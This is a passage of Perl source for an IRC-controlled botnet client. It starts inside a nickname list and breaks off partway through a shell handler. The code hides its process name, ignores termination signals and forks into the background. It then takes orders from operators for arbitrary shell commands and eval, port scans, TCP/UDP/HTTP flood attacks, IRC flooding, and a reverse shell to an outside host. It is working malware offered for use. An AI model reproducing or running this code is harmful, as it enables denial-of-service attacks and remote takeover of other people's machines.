"Madigan", 690 | "Maggio", 691 | "Mahony", 692 | "Maier", 693 | "Maine-Hershey", 694 | "Maisano", 695 | "Malatesta", 696 | "Maller", 697 | "Malova", 698 | "Manalis", 699 | "Mandel", 700 | "Manganiello", 701 | "Mantovan", 702 | "March", 703 | "Marchbanks", 704 | "Marcus", 705 | "Margalit", 706 | "Margetts", 707 | "Marques", 708 | "Martinez", 709 | "Martochio", 710 | "Marton", 711 | "Marubini", 712 | "Mass", 713 | "Matalka", 714 | "Matarazzo", 715 | "Matsukata", 716 | "Mattson", 717 | "Mauzy", 718 | "May", 719 | "Mazzali", 720 | "Mazziotta", 721 | "Mcbride", 722 | "Mccaffery", 723 | "Mccall", 724 | "Mcclearn", 725 | "Mcdowell", 726 | "Mcelroy", 727 | "McFadden", 728 | "Mcghee", 729 | "Mcgoldrick", 730 | "McIlroy", 731 | "Mcintosh", 732 | "Mckenna", 733 | "Mclane", 734 | "Mclaren", 735 | "Mcnealy", 736 | "Mcnulty", 737 | "Meccariello", 738 | "Memisoglu", 739 | "Menzies", 740 | "Merikoski", 741 | "Merlani", 742 | "Merminod", 743 | "Merseth", 744 | "Merz", 745 | "Metelka", 746 | "Metropolis", 747 | "Meurer", 748 | "Michelman", 749 | "Middle", 750 | "Mieher", 751 | "Mills", 752 | "Minh", 753 | "Mini", 754 | "Minichiello", 755 | "Gonzalez", 756 | "Mitropoulos", 757 | "Mittal", 758 | "Mocroft", 759 | "Modestino", 760 | "Moeller", 761 | "Mohr", 762 | "Moiamedi", 763 | "Monque", 764 | "Montilio", 765 | "MooreDeCh.", 766 | "Morani", 767 | "Moreton", 768 | "Morrison", 769 | "Morrow", 770 | "Mortimer", 771 | "Mosher", 772 | "Mosler", 773 | "Mostafavi", 774 | "Motooka", 775 | "Mudarri", 776 | "Muello", 777 | "Mugnai", 778 | "Mulkern", 779 | "Mulroy", 780 | "Mumford", 781 | "Mussachio", 782 | "Naddeo", 783 | "Napolitano", 784 | "Nardi", 785 | "Nardone", 786 | "Naviaux", 787 | "Nayduch", 788 | "Nelson", 789 | "Nenna", 790 | "Nesci", 791 | "Neuman", 792 | "Newfeld", 793 | "Newlin", 794 | "Ng", 795 | "Ni", 796 | "Nickerson", 797 | "Nickoloff", 798 | "Nisenson", 799 | "Nitabach", 800 | "Notman", 801 | "Nuzum", 802 | "Ocougne", 803 | "Ogata", 804 | "Oh", 805 | "O'hagan", 806 | "Oldford", 807 | "Olsen", 808 | "Olson", 809 | "Olszewski", 810 | "O'malley", 811 | "Oman", 812 | "O'meara", 813 | "Opel", 814 | "Oray", 815 | "Orfield", 816 | "Orsi", 817 | "Ospina", 818 | "Ostrowski", 819 | "Ottaviani", 820 | "Otten", 821 | "Ouchida", 822 | "Ovid", 823 | "PaesDealmeida", 824 | "Paine", 825 | "Palayoor", 826 | "Palepu", 827 | "Pallara", 828 | "Palmitesta", 829 | "Panadero", 830 | "Panizzon", 831 | "Pantilla", 832 | "Paoletti", 833 | "Parmeggiani", 834 | "Parris", 835 | "Partridge", 836 | "Pascucci", 837 | "Patefield", 838 | "Patrick", 839 | "Pattullo", 840 | "Pavetti", 841 | "Pavlon", 842 | "Pawloski", 843 | "Paynter", 844 | "Peabody", 845 | "Pearlberg", 846 | "Pederson", 847 | "Peishel", 848 | "Penny", 849 | "Pereira", 850 | "Perko", 851 | "Perlak", 852 | "Perlman", 853 | "Perna", 854 | "Perone", 855 | "Perrimon", 856 | "Peters", 857 | "Petruzello", 858 | "Pettibone", 859 | "Pettit", 860 | "Pfister", 861 | "Pilbeam", 862 | "Pinot", 863 | "Plancon", 864 | "Plant", 865 | "Plasket", 866 | "Plous", 867 | "Po", 868 | "Pocobene", 869 | "Poincaire", 870 | "Pointer", 871 | "Poirier", 872 | "Polak", 873 | "Polanyi", 874 | "Politis", 875 | "Poma", 876 | "Poolman", 877 | "Powers", 878 | "Presper", 879 | "Preucel", 880 | "Prevost", 881 | "Pritchard", 882 | "Pritz", 883 | "Proietti", 884 | "Prothrow-Stith", 885 | "Puccia", 886 | "Pugh", 887 | "Pynchon", 888 | "Quaday", 889 | "Quetin", 890 | "Rabe", 891 | "Rabkin", 892 | "Radeke", 893 | "Rajagopalan", 894 | "Raney", 895 | "Rangan", 896 | "Rankin", 897 | "Rapple", 898 | "Rayport", 899 | "Redden-Tyler", 900 | "Reedquist", 901 | "Cunningham", 902 | "Reinold", 903 | "Remak", 904 | "Renick", 905 | "Repetto", 906 | "Resnik", 907 | "Rhea", 908 | "Richmond", 909 | "Rielly", 910 | "Rindos", 911 | "Rineer", 912 | "Rish", 913 | "Rivera", 914 | "Robinson", 915 | "Rocha", 916 | "Roesler", 917 | "Rogers", 918 | "Ronen", 919 | "Row", 920 | "Royal", 921 | "Ru", 922 | "Ruan", 923 | "Ruderman", 924 | "Ruescher", 925 | "Rush", 926 | "Ryu", 927 | "Sabatello", 928 | "Sadler", 929 | "Safire", 930 | "Sahu", 931 | "Sali", 932 | "Samson", 933 | "Sanchez-Ramirez", 934 | "Sanna", 935 | "Sapers", 936 | "Sarin", 937 | "Sartore", 938 | "Sase", 939 | "Satin", 940 | "Satta", 941 | "Satterthwaite", 942 | "Sawtell", 943 | "Sayied", 944 | "Scarponi", 945 | "Scepan", 946 | "Scharf", 947 | "Scharlemann", 948 | "Scheiner", 949 | "Schiano", 950 | "Schifini", 951 | "Schilling", 952 | "Schmitt", 953 | "Schossberger", 954 | "Schuman", 955 | "Schutte", 956 | "Schuyler", 957 | "Schwan", 958 | "Schwickrath", 959 | "Scovel", 960 | "Scudder", 961 | "Seaton", 962 | "Seeber", 963 | "Segal", 964 | "Sekler", 965 | "Selvage", 966 | "Sen", 967 | "Sennett", 968 | "Seterdahl", 969 | "Sexton", 970 | "Seyfert", 971 | "Shaikh", 972 | "Shakis", 973 | "Shankland", 974 | "Shanley", 975 | "Shar", 976 | "Shatrov", 977 | "Shavelson", 978 | "Shea", 979 | "Sheats", 980 | "Shepherd", 981 | "Sheppard", 982 | "Shepstone", 983 | "Shesko", 984 | "Shia", 985 | "Shibata", 986 | "Shimon", 987 | "Siesto", 988 | "Sigalot", 989 | "Sigini", 990 | "Signa", 991 | "Silverman", 992 | "Silvetti", 993 | "Sinsabaugh", 994 | "Sirilli", 995 | "Sites", 996 | "Skane", 997 | "Skerry", 998 | "Skoda", 999 | "Sloan", 1000 | "Slowe", 1001 | "Smilow", 1002 | "Sniffen", 1003 | "Snodgrass", 1004 | "Socolow", 1005 | "Solon", 1006 | "Somers", 1007 | "Sommariva", 1008 | "Sorabella", 1009 | "Sorg", 1010 | "Sottak", 1011 | "Soukup", 1012 | "Soule", 1013 | "Soultanian", 1014 | "Spanier", 1015 | "Sparrow", 1016 | "Spaulding", 1017 | "Speizer", 1018 | "Spence", 1019 | "Sperber", 1020 | "Spicer", 1021 | "Spiegelhalter", 1022 | "Spiliotis", 1023 | "Spinrad", 1024 | "StMartin", 1025 | "Stalvey", 1026 | "Stam", 1027 | "Stang", 1028 | "Stassinopolus", 1029 | "States", 1030 | "Statlender", 1031 | "Stefani", 1032 | "Steiner", 1033 | "Stephanian", 1034 | "Stepniewska", 1035 | "Stewart-Oaten", 1036 | "Stiepock", 1037 | "Stillwell", 1038 | "Stock", 1039 | "Stockton", 1040 | "Stockwell", 1041 | "Stolzenberg", 1042 | "Stonich", 1043 | "Storer", 1044 | "Stott", 1045 | "Strange", 1046 | "Strauch", 1047 | "Streiff", 1048 | "Stringer", 1049 | "Sullivan", 1050 | "Sumner", 1051 | "Suo", 1052 | "Surdam", 1053 | "Sweeting", 1054 | "Sweetser", 1055 | "Swindle", 1056 | "Tagiuri", 1057 | "Tai", 1058 | "Talaugon", 1059 | "Tambiah", 1060 | "Tandler", 1061 | "Tanowitz", 1062 | "Tatar", 1063 | "Taveras", 1064 | "Tawn", 1065 | "Tcherepnin", 1066 | "Teague", 1067 | "Temes", 1068 | "Temmer", 1069 | "Tenney", 1070 | "Terracini", 1071 | "Than", 1072 | "Thavaneswaran", 1073 | "Theodos", 1074 | "Thibault", 1075 | "Thisted", 1076 | "Thomsen", 1077 | "Throop", 1078 | "Tierney", 1079 | "Till", 1080 | "Timmons", 1081 | "Tofallis", 1082 | "Tollestrup", 1083 | "Tolls", 1084 | "Tolman", 1085 | "Tomford", 1086 | "Toomer", 1087 | "Topulos", 1088 | "Torresi", 1089 | "Torske", 1090 | "Towler", 1091 | "Toye", 1092 | "Traebert", 1093 | "Trenga", 1094 | "Trewin", 1095 | "Tringali", 1096 | "Troiani", 1097 | "Troy", 1098 | "Truss", 1099 | "Tsiatis", 1100 | "Tsomides", 1101 | "Tsukurov", 1102 | "Tuck", 1103 | "Tudge", 1104 | "Tukan", 1105 | "Turano", 1106 | "Turek", 1107 | "Tuttle", 1108 | "Twells", 1109 | "Tzamarias", 1110 | "Ullman", 1111 | "Untermeyer", 1112 | "Upsdell", 1113 | "Urban", 1114 | "Urdang-Brown", 1115 | "Usdan", 1116 | "Uzuner", 1117 | "Vacca", 1118 | "Waite", 1119 | "Valberg", 1120 | "Valencia", 1121 | "Wales", 1122 | "Wallenberg", 1123 | "Walter", 1124 | "vanAllen", 1125 | "VanZwet", 1126 | "Vandenberg", 1127 | "Vanheeckeren", 1128 | "Warshafsky", 1129 | "Wasowska", 1130 | "Vasquez", 1131 | "Waugh", 1132 | "Weighart", 1133 | "Weingarten", 1134 | "Weinhaus", 1135 | "Weissbourd", 1136 | "Weissman", 1137 | "Velasquez", 1138 | "Welles", 1139 | "Welsh", 1140 | "Wengret", 1141 | "Venne", 1142 | "Verghese", 1143 | "Wescott", 1144 | "Wetzel", 1145 | "Whately", 1146 | "Whilton", 1147 | "White", 1148 | "Whitla", 1149 | "Whittaker", 1150 | "Viana", 1151 | "Viano", 1152 | "Wiedersheim", 1153 | "Wiener", 1154 | "Viens", 1155 | "Vignola", 1156 | "Wilder", 1157 | "Wilhelm", 1158 | "Wilk", 1159 | "Wilkin", 1160 | "Wilkinson", 1161 | "Villarreal", 1162 | "Willstatter", 1163 | "Wilson", 1164 | "Vitali", 1165 | "Viviani", 1166 | "Voigt", 1167 | "Wolk", 1168 | "VonHoffman", 1169 | "Woo", 1170 | "Wooden", 1171 | "Woods", 1172 | "Woods-Powell", 1173 | "Vorhaus", 1174 | "Votey", 1175 | "Yacono", 1176 | "Yamane", 1177 | "Yankee", 1178 | "Yarchuk", 1179 | "Yates", 1180 | "Ybarra", 1181 | "Yedidia", 1182 | "Yesson", 1183 | "Yetiv", 1184 | "Yoffe", 1185 | "Yoo", 1186 | "Youk-See", 1187 | "Yu", 1188 | "Zachary", 1189 | "Zahedi", 1190 | "Zangwill", 1191 | "Zegans", 1192 | "Zerbini", 1193 | "Zoldak", 1194 | "Zucconi", 1195 | "Zurn", 1196 | "Zytowski"); 1197 | my $nick = $nickname[rand scalar @nickname]; 1198 | #Nickname of insect 1199 | my $ircname =$nickname[rand scalar @nickname]; 1200 | $servidor = $ARGV[0] unless $servidor; 1201 | my $porta = $ARGV[1]; 1202 | my @canais = ('#'.$ARGV[2]); 1203 | my @adms = ("$ARGV[3]"); 1204 | my $processo = $ARGV[4]; 1205 | chop (my $realname = `hostname`); 1206 | 1207 | my $success = "\n [+] Bot Shell\n [-] Loading Successfully ...\n [-] Process/PID : $fakeproc - $$\n\n"; 1208 | my $failed = "\n [?] perl $0 \n\n"; 1209 | 1210 | if (@ARGV != 5) { print $failed; exit(); } else { print $success; } 1211 | 1212 | $SIG{'INT'} = 'IGNORE'; 1213 | $SIG{'HUP'} = 'IGNORE'; 1214 | $SIG{'TERM'} = 'IGNORE'; 1215 | $SIG{'CHLD'} = 'IGNORE'; 1216 | $SIG{'PS'} = 'IGNORE'; 1217 | 1218 | use IO::Socket; 1219 | use Socket; 1220 | use IO::Select; 1221 | chdir("/"); 1222 | $servidor="$ARGV[0]" if $ARGV[0]; 1223 | $0="$processo"."\0"x16;; 1224 | my $pid=fork; 1225 | exit if $pid; 1226 | die "Problema com o fork: $!" unless defined($pid); 1227 | our %irc_servers; 1228 | our %DCC; 1229 | my $dcc_sel = new IO::Select->new(); 1230 | $sel_cliente = IO::Select->new(); 1231 | sub sendraw { 1232 | if ($#_ == '1') { 1233 | my $socket = $_[0]; 1234 | print $socket "$_[1]\n"; 1235 | } else { 1236 | print $IRC_cur_socket "$_[0]\n"; 1237 | } 1238 | } 1239 | 1240 | sub conectar { 1241 | my $meunick = $_[0]; 1242 | my $servidor_con = $_[1]; 1243 | my $porta_con = $_[2]; 1244 | 1245 | my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1); 1246 | if (defined($IRC_socket)) { 1247 | $IRC_cur_socket = $IRC_socket; 1248 | 1249 | $IRC_socket->autoflush(1); 1250 | $sel_cliente->add($IRC_socket); 1251 | 1252 | $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con"; 1253 | $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con"; 1254 | $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; 1255 | $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost; 1256 | nick("$meunick"); 1257 | sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname"); 1258 | sleep 1; 1259 | } 1260 | } 1261 | 1262 | my $line_temp; 1263 | while( 1 ) { 1264 | while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); } 1265 | delete($irc_servers{''}) if (defined($irc_servers{''})); 1266 | my @ready = $sel_cliente->can_read(0); 1267 | next unless(@ready); 1268 | foreach $fh (@ready) { 1269 | $IRC_cur_socket = $fh; 1270 | $meunick = $irc_servers{$IRC_cur_socket}{'nick'}; 1271 | $nread = sysread($fh, $msg, 4096); 1272 | if ($nread == 0) { 1273 | $sel_cliente->remove($fh); 1274 | $fh->close; 1275 | delete($irc_servers{$fh}); 1276 | } 1277 | @lines = split (/\n/, $msg); 1278 | 1279 | for(my $c=0; $c<= $#lines; $c++) { 1280 | $line = $lines[$c]; 1281 | $line=$line_temp.$line if ($line_temp); 1282 | $line_temp=''; 1283 | $line =~ s/\r$//; 1284 | unless ($c == $#lines) { 1285 | parse("$line"); 1286 | } else { 1287 | if ($#lines == 0) { 1288 | parse("$line"); 1289 | } elsif ($lines[$c] =~ /\r$/) { 1290 | parse("$line"); 1291 | } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { 1292 | parse("$line"); 1293 | } else { 1294 | $line_temp = $line; 1295 | } 1296 | } 1297 | } 1298 | } 1299 | } 1300 | 1301 | sub parse { 1302 | my $servarg = shift; 1303 | if ($servarg =~ /^PING \:(.*)/) { 1304 | sendraw("PONG :$1"); 1305 | } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { 1306 | my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; 1307 | if ($args =~ /^\001VERSION\001$/) { 1308 | notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001"); 1309 | } 1310 | if (grep {$_ =~ /^\Q$pn\E$/i } @adms) { 1311 | if ($onde eq "$meunick"){ 1312 | shell("$pn", "$args"); 1313 | } 1314 | if ($args =~ /^(\Q$meunick\E|\!bht)\s+(.*)/ ) { 1315 | my $natrix = $1; 1316 | my $arg = $2; 1317 | if ($arg =~ /^\!(.*)/) { 1318 | ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/); 1319 | } elsif ($arg =~ /^\@(.*)/) { 1320 | $ondep = $onde; 1321 | $ondep = $pn if $onde eq $meunick; 1322 | bfunc("$ondep","$1", "$pn"); 1323 | } else { 1324 | shell("$onde", "$arg"); 1325 | } 1326 | } 1327 | } 1328 | } 1329 | elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { 1330 | if (lc($1) eq lc($meunick)) { 1331 | $meunick=$4; 1332 | $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; 1333 | } 1334 | } elsif ($servarg =~ m/^\:(.+?)\s+433/i) { 1335 | nick("$meunick-".int rand(999999)); 1336 | } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { 1337 | $meunick = $2; 1338 | $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; 1339 | $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; 1340 | foreach my $canal (@canais) { 1341 | sendraw("JOIN $canal s6x"); 1342 | sendraw("PRIVMSG @adms :You Are My Master"); 1343 | } 1344 | } 1345 | } 1346 | 1347 | sub bfunc { 1348 | my $msgpriv = "$_[2]"; 1349 | my $printl = $_[0]; 1350 | my $funcarg = $_[1]; 1351 | if (my $pid = fork) { 1352 | waitpid($pid, 0); 1353 | } else { 1354 | if (fork) { 1355 | exit; 1356 | } else { 1357 | if ($funcarg =~ /^nick (.*)/) { 1358 | sendraw($IRC_cur_socket, "NICK ".$1); 1359 | $nick=$1; 1360 | } 1361 | if ($funcarg =~ /^join (.*)/) { 1362 | sendraw($IRC_cur_socket, "JOIN ".$1); 1363 | } 1364 | if ($funcarg =~ /^part (.*)/) { 1365 | sendraw($IRC_cur_socket, "PART ".$1); 1366 | } 1367 | if ($funcarg =~ /^msg\s+(\S+) (.*)/) { 1368 | sendraw($IRC_cur_socket, "PRIVMSG ".$1." :".$2); 1369 | } 1370 | if ($funcarg =~ /^op (.*)/) { 1371 | sendraw($IRC_cur_socket, "MODE $printl +o ".$1); 1372 | } 1373 | if ($funcarg =~ /^deop (.*)/) { 1374 | sendraw($IRC_cur_socket, "MODE $printl -o ".$1); 1375 | } 1376 | if ($funcarg =~ /^voice (.*)/) { 1377 | sendraw($IRC_cur_socket, "MODE $printl +v ".$1); 1378 | } 1379 | if ($funcarg =~ /^die (.*)/) { 1380 | sendraw($IRC_cur_socket, "QUIT :".$1); 1381 | $killd = "kill -9 ".fork; 1382 | system (`$killd`); 1383 | } 1384 | if ($funcarg =~ /^devoice (.*)/) { 1385 | sendraw($IRC_cur_socket, "MODE $printl -v ".$1); 1386 | } 1387 | if ($funcarg =~ /^say (.*)/) { 1388 | sendraw($IRC_cur_socket, "PRIVMSG $printl :".$1); 1389 | } 1390 | if ($funcarg =~ /^reset(.*)/) { 1391 | sendraw($IRC_cur_socket, "QUIT :Di3 for my Master"); 1392 | } 1393 | if ($funcarg =~ /^die(.*)/) { 1394 | if ($1 eq ""){ 1395 | sendraw($IRC_cur_socket, "QUIT :Di3 for my Master"); 1396 | $killd = "kill -9 ".fork; 1397 | system (`$killd`); 1398 | } 1399 | } 1400 | 1401 | if ($funcarg =~ /^tsunami\s+(\d+)\s+(.*)/) { 1402 | for (my $dx=0; $dx<=$1; $dx++) 1403 | { 1404 | my @nickxxxx = ("\\","|","_","-","`","^","{","}","[","]"); 1405 | $nickfgv = $nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx]; 1406 | $msgflood = ""; 1407 | $msgflood = $msgflood.$msgflood; 1408 | sendraw($IRC_cur_socket, "NICK ".$nickfgv); 1409 | sleep 10; 1410 | sendraw($IRC_cur_socket, "PRIVMSG ".$2." :".$msgflood); 1411 | sleep 2; 1412 | sendraw($IRC_cur_socket, "NOTICE ".$2." :".$msgflood); 1413 | } 1414 | sendraw($IRC_cur_socket, "NICK ".$nick); 1415 | } 1416 | if ($funcarg =~ /^help(.*)/) { 1417 | if ($printl eq "$msgpriv"){ 1418 | $msghelp ="PRIVMSG $msgpriv"; 1419 | }else{ 1420 | $msghelp ="NOTICE $msgpriv"; 1421 | } 1422 | sendraw($IRC_cur_socket, $msghelp." :15(7@2Command List @adms15)"); 1423 | sendraw($IRC_cur_socket, $msghelp." :15(7@2Copyright (C) 200715)"); 1424 | sleep 2; 1425 | sendraw($IRC_cur_socket, $msghelp." :12<------------------------------------------------>"); 1426 | sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2help15)"); 1427 | sleep 2; 1428 | sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2portscan15) "); 1429 | sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2udpflood15)

"); 1430 | sleep 2; 1431 | sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2tcpflood15) "); 1432 | sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2httpflood15) "); 1433 | sleep 2; 1434 | sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2say15) "); 1435 | sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2join15) <#>"); 1436 | sleep 2; 1437 | sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2part15) <#>"); 1438 | sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2nick15) "); 1439 | sleep 2; 1440 | sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2msg15) <#/nick>"); 1441 | sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2tsunami15) <#/nick> "); 1442 | sleep 2; 1443 | sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2op15) "); 1444 | sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2deop15) "); 1445 | sleep 2; 1446 | sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2voice15) "); 1447 | sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2devoice15) "); 1448 | sleep 2; 1449 | sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2reset15)"); 1450 | sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2die15) "); 1451 | sleep 2; 1452 | sendraw($IRC_cur_socket, $msghelp." :".$nick." 15(7@2back15) "); 1453 | sendraw($IRC_cur_socket, $msghelp." :".$nick." 15(7@2command\B2 di atas15)"); 1454 | sleep 2; 1455 | sendraw($IRC_cur_socket, $msghelp." :12<------------------------------------------------>"); 1456 | } 1457 | if ($funcarg =~ /^portscan (.*)/) { 1458 | my $hostip="$1"; 1459 | my @portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","9997","10000","12345","19150","27374","31310","33133","33733","55555"); 1460 | my (@aberta, %porta_banner); 1461 | sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2Portscan15)12 Scanning4 ".$1." 12for open ports."); 1462 | foreach my $porta (@portas){ 1463 | my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4); 1464 | if ($scansock) { 1465 | push (@aberta, $porta); 1466 | $scansock->close; 1467 | } 1468 | } 1469 | 1470 | if (@aberta) { 1471 | sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2ScanPort15)12 Open port(s):4 @aberta"); 1472 | } else { 1473 | sendraw($IRC_cur_socket,"PRIVMSG $printl :15(7@2ScanPort15)12 No open ports found."); 1474 | } 1475 | } 1476 | if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/){ 1477 | sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2TCP DDoSing15)12 Attacking4 ".$1.":".$2." 12for4 ".$3." 12seconds."); 1478 | my $itime = time; 1479 | my ($cur_time); 1480 | $cur_time = time - $itime; 1481 | while ($3>$cur_time){ 1482 | $cur_time = time - $itime; 1483 | &tcpflooder("$1","$2","$3"); 1484 | } 1485 | sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2TCP DDoSing15)12 Attack done4 ".$1.":".$2."."); 1486 | } 1487 | if ($funcarg =~ /^version/) { 1488 | sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2Version15)12 mIRC324 ".$VERSAO." 12K.Mardam-Bey"); 1489 | } 1490 | 1491 | if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) { 1492 | my $host = "$1"; 1493 | my $porta = "$2"; 1494 | my $proto = getprotobyname('tcp'); 1495 | my $iaddr = inet_aton($host); 1496 | my $paddr = sockaddr_in($porta, $iaddr); 1497 | my $shell = "/bin/sh -i"; 1498 | if ($^O eq "MSWin32") { 1499 | $shell = "cmd.exe"; 1500 | } 1501 | socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; 1502 | connect(SOCKET, $paddr) or die "connect: $!"; 1503 | open(STDIN, ">&SOCKET"); 1504 | open(STDOUT, ">&SOCKET"); 1505 | open(STDERR, ">&SOCKET"); 1506 | system("$shell"); 1507 | close(STDIN); 1508 | close(STDOUT); 1509 | close(STDERR); 1510 | 1511 | sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2BackConnect15)4: 12Connecting to4 $host:$porta"); 1512 | 1513 | } 1514 | 1515 | if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) { 1516 | sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2HTTP DDoSing15)12 Attacking4 ".$1.":80 12for4 ".$2." 12seconds."); 1517 | my $itime = time; 1518 | my ($cur_time); 1519 | $cur_time = time - $itime; 1520 | while ($2>$cur_time){ 1521 | $cur_time = time - $itime; 1522 | my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80); 1523 | print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n"; 1524 | close($socket); 1525 | } 1526 | sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2HTTP15)12 Attacking done4 ".$1."."); 1527 | } 1528 | if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) { 1529 | sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2UDP DDoSing15)12 Attacking4 ".$1." 12with4 ".$2." 12Kb packets for4 ".$3." 12seconds."); 1530 | my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3"); 1531 | $dtime = 1 if $dtime == 0; 1532 | my %bytes; 1533 | $bytes{igmp} = $2 * $pacotes{igmp}; 1534 | $bytes{icmp} = $2 * $pacotes{icmp}; 1535 | $bytes{o} = $2 * $pacotes{o}; 1536 | $bytes{udp} = $2 * $pacotes{udp}; 1537 | $bytes{tcp} = $2 * $pacotes{tcp}; 1538 | sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2UDP15)12 Sent4 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 12Kb in4 ".$dtime." 12seconds to4 ".$1."."); 1539 | } 1540 | exit; 1541 | } 1542 | } 1543 | } 1544 | 1545 | sub ircase { 1546 | my ($kem, $printl, $case) = @_; 1547 | 1548 | if ($case =~ /^join (.*)/) { 1549 | j("$1"); 1550 | } 1551 | if ($case =~ /^part (.*)/) { 1552 | p("$1"); 1553 | } 1554 | if ($case =~ /^rejoin\s+(.*)/) { 1555 | my $chan = $1; 1556 | if ($chan =~ /^(\d+) (.*)/) { 1557 | for (my $ca = 1; $ca <= $1; $ca++ ) { 1558 | p("$2"); 1559 | j("$2"); 1560 | } 1561 | } else { 1562 | p("$chan"); 1563 | j("$chan"); 1564 | } 1565 | } 1566 | if ($case =~ /^op/) { 1567 | op("$printl", "$kem") if $case eq "op"; 1568 | my $oarg = substr($case, 3); 1569 | op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); 1570 | } 1571 | if ($case =~ /^deop/) { 1572 | deop("$printl", "$kem") if $case eq "deop"; 1573 | my $oarg = substr($case, 5); 1574 | deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); 1575 | } 1576 | if ($case =~ /^msg\s+(\S+) (.*)/) { 1577 | msg("$1", "$2"); 1578 | } 1579 | if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) { 1580 | for (my $cf = 1; $cf <= $1; $cf++) { 1581 | msg("$2", "$3"); 1582 | } 1583 | } 1584 | if ($case =~ /^ctcp\s+(\S+) (.*)/) { 1585 | ctcp("$1", "$2"); 1586 | } 1587 | if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) { 1588 | for (my $cf = 1; $cf <= $1; $cf++) { 1589 | ctcp("$2", "$3"); 1590 | } 1591 | } 1592 | if ($case =~ /^nick (.*)/) { 1593 | nick("$1"); 1594 | } 1595 | if ($case =~ /^connect\s+(\S+)\s+(\S+)/) { 1596 | conectar("$2", "$1", 6667); 1597 | } 1598 | if ($case =~ /^raw (.*)/) { 1599 | sendraw("$1"); 1600 | } 1601 | if ($case =~ /^eval (.*)/) { 1602 | eval "$1"; 1603 | } 1604 | } 1605 | 1606 | sub shell { 1607 | my $printl=$_[0]; 1608 | my $comando=$_[1]; 1609 | if ($comando =~ /cd (.*)/) { 1610 | chdir("$1") || msg("$printl", "No such file or directory"); 1611 | return; 1612 | } 1613 | elsif ($pid = fork) { 1614 | waitpid($pid, 0); 1615 | } else { 1616 | if (fork) { 1617 | exit; 1618 | } else { 1619 | my @resp=`$comando 2>&1 3>&1`; 1620 | my $c=0; 1621 | foreach my $linha (@resp) { 1622 | $c++; 1623 | chop $linha; 1624 | 